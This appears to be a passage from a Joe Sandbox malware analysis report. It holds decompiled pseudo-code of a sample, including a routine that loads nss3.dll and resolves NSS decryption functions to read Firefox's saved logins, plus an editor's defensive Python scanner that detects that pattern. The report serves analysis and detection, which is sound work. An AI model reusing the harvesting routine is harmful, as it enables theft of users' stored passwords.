                                                                                                                                                                        					}
                                                                                                                                                                        					_t61 = ReadProcessMemory(_v4,  *0x417c58,  &_a264, 0x80, 0);
                                                                                                                                                                        					__eflags = _t61;
                                                                                                                                                                        					if(_t61 != 0) {
                                                                                                                                                                        						E004065B4( &_a2080,  &_a264, 0);
                                                                                                                                                                        						_pop(_t102);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t62 = E004062A6();
                                                                                                                                                                        					__eflags = _t62;
                                                                                                                                                                        					if(_t62 == 0) {
                                                                                                                                                                        						E0040E6C7();
                                                                                                                                                                        					} else {
                                                                                                                                                                        						E0040E74B();
                                                                                                                                                                        					}
                                                                                                                                                                        					__eflags =  *0x418514;
                                                                                                                                                                        					if(__eflags != 0) {
                                                                                                                                                                        						L17:
                                                                                                                                                                        						_a776 = 0;
                                                                                                                                                                        						memset( &_a780, 0, 0x114);
                                                                                                                                                                        						_t122 =  *0x417e7c; // 0x0
                                                                                                                                                                        						_t134 = _t134 + 0xc;
                                                                                                                                                                        						_t66 = GetCurrentProcessId();
                                                                                                                                                                        						 *0x418108 = 0;
                                                                                                                                                                        						E0040E8C6(_t102, __eflags, _t66, _t122);
                                                                                                                                                                        						__eflags =  *0x418108;
                                                                                                                                                                        						if( *0x418108 != 0) {
                                                                                                                                                                        							memcpy( &_a776, 0x417ff0, 0x118);
                                                                                                                                                                        							_t134 = _t134 + 0xc;
                                                                                                                                                                        							__eflags =  *0x418108;
                                                                                                                                                                        							if( *0x418108 != 0) {
                                                                                                                                                                        								strcpy( &_v0, E004061F0( &_a784));
                                                                                                                                                                        							}
                                                                                                                                                                        						}
						goto L20;
					} else {
						__eflags =  *0x418518;
						if(__eflags == 0) {
							L20:
							// Formats the crash/exception report (address, module, register and stack/code dumps)
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x417e70,  *0x417e7c,  &_v0,  *0x417c50,  *0x417c44,  *0x417c4c,  *0x417c48,  *0x417c40,  *0x417c3c,  *0x417c54,  *0x417c64,  *0x417c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104); // control ID 0x3ea is the report edit box
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);  // EM_SETSEL: select all text in the edit box
							SendMessageA(_v4, 0x301, 0, 0);       // WM_COPY: copy the selection to the clipboard
							SendMessageA(_v4, 0xb1, 0, 0);        // EM_SETSEL: clear the selection
						}
					}
				}
				goto L21;
			}

APIs
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040E460
• {Unknown}, xrefs: 0040E259
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
• API String ID: 138940113-3474136107
• Opcode ID: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
• Instruction ID: c9ff55592ed190661b3986ab950919d3506bad0d2814ede43270e5be3f0f5ae2
• Opcode Fuzzy Hash: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
• Instruction Fuzzy Hash: 4571D672404244BFD721DF61DC45EDB7FEDEB48344F00883EF648921A1DA399A65CBAA
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040E54C(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060DA(0x104,  &_v268, _a4); // copy the caller-supplied directory path
				}
				if(_v268 != 0) {
					// Save the current directory in the context structure, then switch to the target directory
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					// Build "<dir>\nss3.dll" with a MAX_PATH (0x104) bound check
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062B7( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						// Resolve the NSS exports used to access and decrypt the browser's stored login data
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						// Flag 8 is LOAD_WITH_ALTERED_SEARCH_PATH, so nss3.dll's dependencies resolve from its own directory
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040E507();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
                                                                                                                                                                        							 *_t69 = _t56;
                                                                                                                                                                        							if(_t56 != 0) {
                                                                                                                                                                        								goto L9;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return 0 |  *_t69 != 0x00000000;
                                                                                                                                                                        			}
Instruction addresses for the decompiled lines above run from 0x0040e54c to 0x0040e6b1 (the per-line address column of the rendered report).

APIs
• memset.MSVCRT ref: 0040E56D
• GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
• SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
• memset.MSVCRT ref: 0040E5C0
• strlen.MSVCRT ref: 0040E5CA
• strlen.MSVCRT ref: 0040E5D8
• GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
• GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
• GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
• GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
• GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
• GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
• GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
• GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E6A2
  • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
  • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
• String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
• API String ID: 1296682400-4029219660
• Opcode ID: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
• Instruction ID: ea12e4d39b815288b34f85ef975f35705c11e21fdcabb8b0f4231a79c1823d94
• Opcode Fuzzy Hash: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
• Instruction Fuzzy Hash: 7E4197B1940318AACB20DF75CC49FC6BBE8AF64704F154C6BE185A2180E7B9A6D4CF58
Uniqueness

Uniqueness Score: -1.00%
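The function above is the classic runtime-resolution pattern of a Firefox credential harvester: the NSS export names are kept as plain strings and looked up with GetProcAddress once nss3.dll is loaded. As an added example (editor's code, not part of the Joe Sandbox report or of the sample), the scanner below walks a PE file or memory dump for that same export-name cluster together with the loader APIs that resolve it. The threshold it applies (NSS_Init, PK11_GetInternalKeySlot and PK11SDR_Decrypt plus at least one loader API) is an assumption chosen for this illustration, and both input blobs are constructed inline rather than taken from the sample.

```python
"""Flag binaries that carry the NSS export-name cluster a Firefox login decryptor resolves.

Added example for this report; scanner, thresholds and test blobs are the editor's own.
"""
import re
from dataclasses import dataclass

# Export names resolved with GetProcAddress in the decompiled function (report String ID list).
NSS_EXPORTS = (
    b"NSS_Init",
    b"NSS_Shutdown",
    b"PK11_GetInternalKeySlot",
    b"PK11_FreeSlot",
    b"PK11_CheckUserPassword",
    b"PK11_Authenticate",
    b"PK11SDR_Decrypt",
)
# Loader APIs the function uses to resolve them at runtime (imported by name, so ASCII in the file).
LOADER_APIS = (b"GetModuleHandleA", b"LoadLibraryExA", b"GetProcAddress")
MODULE_NAMES = (b"nss3.dll",)

# Assumed minimal set for "can decrypt saved Firefox logins": initialise NSS, obtain the
# internal key slot, call the SDR decrypt primitive. The other exports are optional extras.
CORE_SET = {b"NSS_Init", b"PK11_GetInternalKeySlot", b"PK11SDR_Decrypt"}


def find_string(blob: bytes, name: bytes) -> list:
    """Offsets of every NUL-terminated occurrence of name, as ASCII and as UTF-16LE."""
    variants = (
        name + b"\x00",
        name.decode("ascii").encode("utf-16-le") + b"\x00\x00",
    )
    offsets = []
    for needle in variants:
        offsets.extend(m.start() for m in re.finditer(re.escape(needle), blob))
    return sorted(offsets)


@dataclass
class ScanResult:
    exports: dict  # export name -> offsets
    loader: dict   # loader API name -> offsets
    modules: dict  # module name -> offsets

    @property
    def present_exports(self) -> set:
        return {name for name, offs in self.exports.items() if offs}

    @property
    def uses_runtime_resolution(self) -> bool:
        return any(self.loader.values())

    @property
    def is_suspicious(self) -> bool:
        """True when the decryption core is present and is resolved dynamically."""
        return CORE_SET <= self.present_exports and self.uses_runtime_resolution


def scan(blob: bytes) -> ScanResult:
    """Scan a PE file or a memory dump for the NSS harvesting string cluster."""
    return ScanResult(
        exports={n: find_string(blob, n) for n in NSS_EXPORTS},
        loader={n: find_string(blob, n) for n in LOADER_APIS},
        modules={n: find_string(blob, n) for n in MODULE_NAMES},
    )


def build_stealer_like_blob() -> bytes:
    """Constructed input: a string table shaped like the one the decompiled function walks."""
    filler = b"\x90" * 64
    table = b"\x00".join(NSS_EXPORTS + MODULE_NAMES) + b"\x00"
    imports = b"\x00".join(LOADER_APIS) + b"\x00"
    return filler + table + filler + imports + filler


def build_benign_blob() -> bytes:
    """Constructed input: references nss3.dll and NSS_Init only, so it cannot decrypt logins."""
    return b"\x90" * 32 + b"nss3.dll\x00NSS_Init\x00GetProcAddress\x00" + b"\x90" * 32


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_stealer_like_blob()
    result = scan(data)
    for name, offs in {**result.exports, **result.loader, **result.modules}.items():
        print(f"{name.decode():<24} {', '.join(hex(o) for o in offs) or '-'}")
    print("suspicious:", result.is_suspicious)
```

Run it against the dumped region (for this report, the 0x400000 image of the vbc process named in the snapshot file) or against the dropped executable. The strings alone are not proof of theft: Mozilla's own binaries and legitimate password-recovery utilities carry the same export names, so the verdict needs process context, such as these strings appearing in a non-Mozilla process image, as they do here.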

C-Code - Quality: 87%
			E00401060(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t50;
				struct HBRUSH__* _t62;
				void* _t67;
				unsigned int _t68;
				void* _t73;
				struct HWND__* _t74;
				struct HWND__* _t75;
				void* _t78;
				unsigned int _t79;
				struct HWND__* _t81;
				struct HWND__* _t82;
				struct HWND__* _t83;
				struct HWND__* _t84;
				unsigned int _t89;
				struct HWND__* _t91;
				struct HWND__* _t93;
				struct HWND__* _t94;
				void* _t98;
				void* _t104;
				struct tagPOINT _t109;
				struct tagPOINT _t111;

				// Dialog message handler on an object in __ecx: _a4 is the message, _a8 wParam,
				// _a12 lParam; the dialog's HWND is stored at offset 4 of the object
				_t104 = __edx;
				_t100 = __ecx;
				_t50 = _a4 - 0x110;
				_t98 = __ecx;
				if(_t50 == 0) {
					// WM_INITDIALOG (0x110): show the global string at 0x418348 in control 0x3ee,
					// or hide controls 0x3ed/0x3ee when it is empty, then fill in title and text
					__eflags =  *0x418348;
					if( *0x418348 != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x418348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t98 + 4), 0x3ee), 0);
					}
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					SetWindowTextA( *(_t98 + 4), E004019DA(_t100,  &_v268, 0x413450));
					SetDlgItemTextA( *(_t98 + 4), 0x3ea, _t98 + 0xc);
					SetDlgItemTextA( *(_t98 + 4), 0x3ec, _t98 + 0x10b);
					E00401000(_t98, __eflags);
					E0040649B(_t104,  *(_t98 + 4));
					goto L29;
				} else {
					_t67 = _t50 - 1;
					if(_t67 == 0) {
						// WM_COMMAND (0x111)
						_t68 = _a8;
						__eflags = _t68 - 1;
						if(_t68 != 1) {
							goto L29;
						} else {
							__eflags = _t68 >> 0x10;
							if(_t68 >> 0x10 != 0) {
								goto L29;
							} else {
								// IDOK (1) with notification code 0 (BN_CLICKED): close the dialog
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t98 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t73 = _t67 - 0x27;
						if(_t73 == 0) {
							// WM_CTLCOLORSTATIC (0x138): lParam is the static control's HWND
							_t74 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t74;
							if(_a12 != _t74) {
								__eflags =  *0x418388;
								if( *0x418388 == 0) {
                                                                                                                                                                        									goto L29;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t75 = GetDlgItem( *(_t98 + 4), 0x3ee);
                                                                                                                                                                        									__eflags = _a12 - _t75;
                                                                                                                                                                        									if(_a12 != _t75) {
                                                                                                                                                                        										goto L29;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										goto L18;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								L18:
                                                                                                                                                                        								SetBkMode(_a8, 1);
                                                                                                                                                                        								SetTextColor(_a8, 0xc00000);
                                                                                                                                                                        								_t62 = GetSysColorBrush(0xf);
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t78 = _t73 - 0xc8;
                                                                                                                                                                        							if(_t78 == 0) {
                                                                                                                                                                        								_t79 = _a12;
                                                                                                                                                                        								_t109 = _t79 & 0x0000ffff;
                                                                                                                                                                        								_v12.x = _t109;
                                                                                                                                                                        								_v12.y = _t79 >> 0x10;
                                                                                                                                                                        								_t81 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                                        								_push(_v12.y);
                                                                                                                                                                        								_a8 = _t81;
                                                                                                                                                                        								_t82 = ChildWindowFromPoint( *(_t98 + 4), _t109);
                                                                                                                                                                        								__eflags = _t82 - _a8;
                                                                                                                                                                        								if(_t82 != _a8) {
                                                                                                                                                                        									__eflags =  *0x418388;
                                                                                                                                                                        									if( *0x418388 == 0) {
                                                                                                                                                                        										goto L29;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_t83 = GetDlgItem( *(_t98 + 4), 0x3ee);
                                                                                                                                                                        										_push(_v12.y);
                                                                                                                                                                        										_t84 = ChildWindowFromPoint( *(_t98 + 4), _v12.x);
                                                                                                                                                                        										__eflags = _t84 - _t83;
                                                                                                                                                                        										if(_t84 != _t83) {
                                                                                                                                                                        											goto L29;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											goto L13;
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									L13:
                                                                                                                                                                        									SetCursor(LoadCursorA( *0x417b94, 0x67));
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								if(_t78 != 0) {
                                                                                                                                                                        									L29:
                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t89 = _a12;
                                                                                                                                                                        									_t111 = _t89 & 0x0000ffff;
                                                                                                                                                                        									_v12.x = _t111;
                                                                                                                                                                        									_v12.y = _t89 >> 0x10;
                                                                                                                                                                        									_t91 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                                                                                                                                        									_push(_v12.y);
                                                                                                                                                                        									_a8 = _t91;
                                                                                                                                                                        									if(ChildWindowFromPoint( *(_t98 + 4), _t111) != _a8) {
                                                                                                                                                                        										__eflags =  *0x418388;
                                                                                                                                                                        										if( *0x418388 == 0) {
                                                                                                                                                                        											goto L29;
                                                                                                                                                                        										} else {
                                                                                                                                                                        											_t93 = GetDlgItem( *(_t98 + 4), 0x3ee);
                                                                                                                                                                        											_push(_v12.y);
                                                                                                                                                                        											_t94 = ChildWindowFromPoint( *(_t98 + 4), _v12);
                                                                                                                                                                        											__eflags = _t94 - _t93;
                                                                                                                                                                        											if(_t94 != _t93) {
                                                                                                                                                                        												goto L29;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_push(0x418388);
                                                                                                                                                                        												goto L7;
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									} else {
                                                                                                                                                                        										_push(_t98 + 0x10b);
                                                                                                                                                                        										L7:
                                                                                                                                                                        										_push( *(_t98 + 4));
                                                                                                                                                                        										E00406552();
                                                                                                                                                                        										L8:
                                                                                                                                                                        										_t62 = 1;
                                                                                                                                                                        									}
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t62;
                                                                                                                                                                        			}
                                                                                                                                                                        0x00401193
                                                                                                                                                                        0x00401195
                                                                                                                                                                        0x00401197
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040119d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040119d
                                                                                                                                                                        0x00401197
                                                                                                                                                                        0x00401157
                                                                                                                                                                        0x00401157
                                                                                                                                                                        0x00401166
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401166
                                                                                                                                                                        0x00401097
                                                                                                                                                                        0x00401099
                                                                                                                                                                        0x004012e5
                                                                                                                                                                        0x004012e5
                                                                                                                                                                        0x004012e5
                                                                                                                                                                        0x0040109f
                                                                                                                                                                        0x0040109f
                                                                                                                                                                        0x004010a8
                                                                                                                                                                        0x004010b6
                                                                                                                                                                        0x004010b9
                                                                                                                                                                        0x004010bc
                                                                                                                                                                        0x004010be
                                                                                                                                                                        0x004010c1
                                                                                                                                                                        0x004010d3
                                                                                                                                                                        0x004010ee
                                                                                                                                                                        0x004010f5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004010fb
                                                                                                                                                                        0x00401103
                                                                                                                                                                        0x00401105
                                                                                                                                                                        0x00401110
                                                                                                                                                                        0x00401112
                                                                                                                                                                        0x00401114
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x00401114
                                                                                                                                                                        0x004010d5
                                                                                                                                                                        0x004010db
                                                                                                                                                                        0x004010dc
                                                                                                                                                                        0x004010dc
                                                                                                                                                                        0x004010df
                                                                                                                                                                        0x004010e6
                                                                                                                                                                        0x004010e8
                                                                                                                                                                        0x004010e8
                                                                                                                                                                        0x004010d3
                                                                                                                                                                        0x00401099
                                                                                                                                                                        0x00401091
                                                                                                                                                                        0x00401086
                                                                                                                                                                        0x0040107d
                                                                                                                                                                        0x004012eb

APIs
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
• String ID:
• API String ID: 2998058495-0
• Opcode ID: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
• Instruction ID: d9fb6b658f62cfbd3d3feccfc88cd7b26f9bda258aecb32a4b2b6428ade5212d
• Opcode Fuzzy Hash: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
• Instruction Fuzzy Hash: 21619D31400248FBDF129F60DD89BAA7FA5EB04715F14C1B6F908BA2F1C7759A90DB58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
E0040A88E(intOrPtr __ecx, void* __eflags) {
    void* __ebx;
    void* __edi;
    void* __esi;
    struct HMENU__* _t121;
    struct HWND__* _t122;
    intOrPtr _t128;
    int _t133;
    intOrPtr _t135;
    int _t149;
    void* _t166;
    char* _t174;
    void* _t178;
    void* _t185;
    intOrPtr _t194;
    void* _t197;
    void* _t198;
    intOrPtr _t200;
    intOrPtr _t201;
    void* _t202;
    int _t204;
    intOrPtr _t205;
    intOrPtr* _t207;
    intOrPtr* _t208;
    void* _t210;
    intOrPtr* _t211;
    void* _t213;

    _t213 = __eflags;
    _t208 = _t210 - 0x78;
    _t211 = _t210 - 0xb8;
     *((intOrPtr*)(_t208 + 0x70)) = __ecx;
     *((char*)(_t208 - 0x37)) = 1;
     *(_t208 - 0x40) = 0;
     *((intOrPtr*)(_t208 - 0x3c)) = 0;
     *((char*)(_t208 - 0x38)) = 0;
     *((char*)(_t208 - 0x36)) = 0;
     *((char*)(_t208 - 0x35)) = 0;
    asm("stosd");
    asm("stosd");
     *(_t208 - 0x2c) = 1;
     *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
     *((char*)(_t208 - 0x24)) = 4;
     *((char*)(_t208 - 0x23)) = 0;
     *((char*)(_t208 - 0x22)) = 0;
     *((char*)(_t208 - 0x21)) = 0;
    asm("stosd");
    asm("stosd");
     *((intOrPtr*)(_t208 - 0x18)) = 5;
     *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
     *((char*)(_t208 - 0x10)) = 4;
     *((char*)(_t208 - 0xf)) = 0;
     *((char*)(_t208 - 0xe)) = 0;
     *((char*)(_t208 - 0xd)) = 0;
    asm("stosd");
    asm("stosd");
     *(_t208 - 4) = 2;
     *_t208 = 0x9c48;
     *((char*)(_t208 + 4)) = 4;
     *((char*)(_t208 + 5)) = 0;
     *((char*)(_t208 + 6)) = 0;
     *((char*)(_t208 + 7)) = 0;
    asm("stosd");
    asm("stosd");
     *((intOrPtr*)(_t208 + 0x10)) = 3;
     *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
     *((char*)(_t208 + 0x18)) = 4;
     *((char*)(_t208 + 0x19)) = 0;
     *((char*)(_t208 + 0x1a)) = 0;
     *((char*)(_t208 + 0x1b)) = 0;
    asm("stosd");
    asm("stosd");
     *((intOrPtr*)(_t208 + 0x24)) = 0;
     *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
     *((char*)(_t208 + 0x2c)) = 4;
     *((char*)(_t208 + 0x2d)) = 0;
     *((char*)(_t208 + 0x2e)) = 0;
     *((char*)(_t208 + 0x2f)) = 0;
    asm("stosd");
    asm("stosd");
     *((intOrPtr*)(_t208 + 0x38)) = 6;
     *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
     *((char*)(_t208 + 0x40)) = 4;
     *((char*)(_t208 + 0x41)) = 0;
     *((char*)(_t208 + 0x42)) = 0;
     *((char*)(_t208 + 0x43)) = 0;
    asm("stosd");
    asm("stosd");
     *((intOrPtr*)(_t208 + 0x4c)) = 4;
     *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
     *((char*)(_t208 + 0x54)) = 4;
     *((char*)(_t208 + 0x55)) = 0;
                                                                                                                                                                        				 *((char*)(_t208 + 0x56)) = 0;
                                                                                                                                                                        				 *((char*)(_t208 + 0x57)) = 0;
                                                                                                                                                                        				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_t198 = 0x66;
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_t121 = E00407D23(_t198);
                                                                                                                                                                        				_t194 =  *((intOrPtr*)(_t208 + 0x70));
                                                                                                                                                                        				 *(_t194 + 0x11c) = _t121;
                                                                                                                                                                        				_t122 = SetMenu( *(_t194 + 0x108), _t121);
                                                                                                                                                                        				__imp__#6(0x50000000, 0x41344f,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
                                                                                                                                                                        				 *(_t194 + 0x114) = _t122;
                                                                                                                                                                        				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
                                                                                                                                                                        				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x417b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
                                                                                                                                                                        				E00402393( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x417b94, 0), 1);
                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t194 + 0x370));
                                                                                                                                                                        				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
                                                                                                                                                                        				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
                                                                                                                                                                        				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
                                                                                                                                                                        				if(_t173 <= 0) {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					_t201 =  *((intOrPtr*)(_t194 + 0x370));
                                                                                                                                                                        					E0040A02E(_t201);
                                                                                                                                                                        					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x417b94, 0x66));
                                                                                                                                                                        					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
                                                                                                                                                                        						E00409F9C(_t133, _t173, _t194, _t201);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t202 = 0x68;
                                                                                                                                                                        					 *((intOrPtr*)(_t194 + 0x154)) = E00407D23(_t202);
                                                                                                                                                                        					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
                                                                                                                                                                        					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
                                                                                                                                                                        						_t174 = 0x41344f;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
                                                                                                                                                                        							_t174 = 0;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_push("/noloadsettings");
                                                                                                                                                                        					_push(_t174);
                                                                                                                                                                        					L00412072();
                                                                                                                                                                        					if(_t135 == 0) {
                                                                                                                                                                        						RegDeleteKeyA(0x80000001, 0x41344f);
                                                                                                                                                                        					}
                                                                                                                                                                        					E0040B031(_t194, 0);
                                                                                                                                                                        					 *( *(_t194 + 0x36c)) = 1;
                                                                                                                                                                        					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
                                                                                                                                                                        					if( *0x418660 == 0) {
                                                                                                                                                                        						E0040617C(0x418660);
                                                                                                                                                                        						if((GetFileAttributesA(0x418660) & 0x00000001) != 0) {
                                                                                                                                                                        							GetTempPathA(0x104, 0x418660);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					_t204 = strlen(0x418660);
                                                                                                                                                                        					 *_t211 = "report.html";
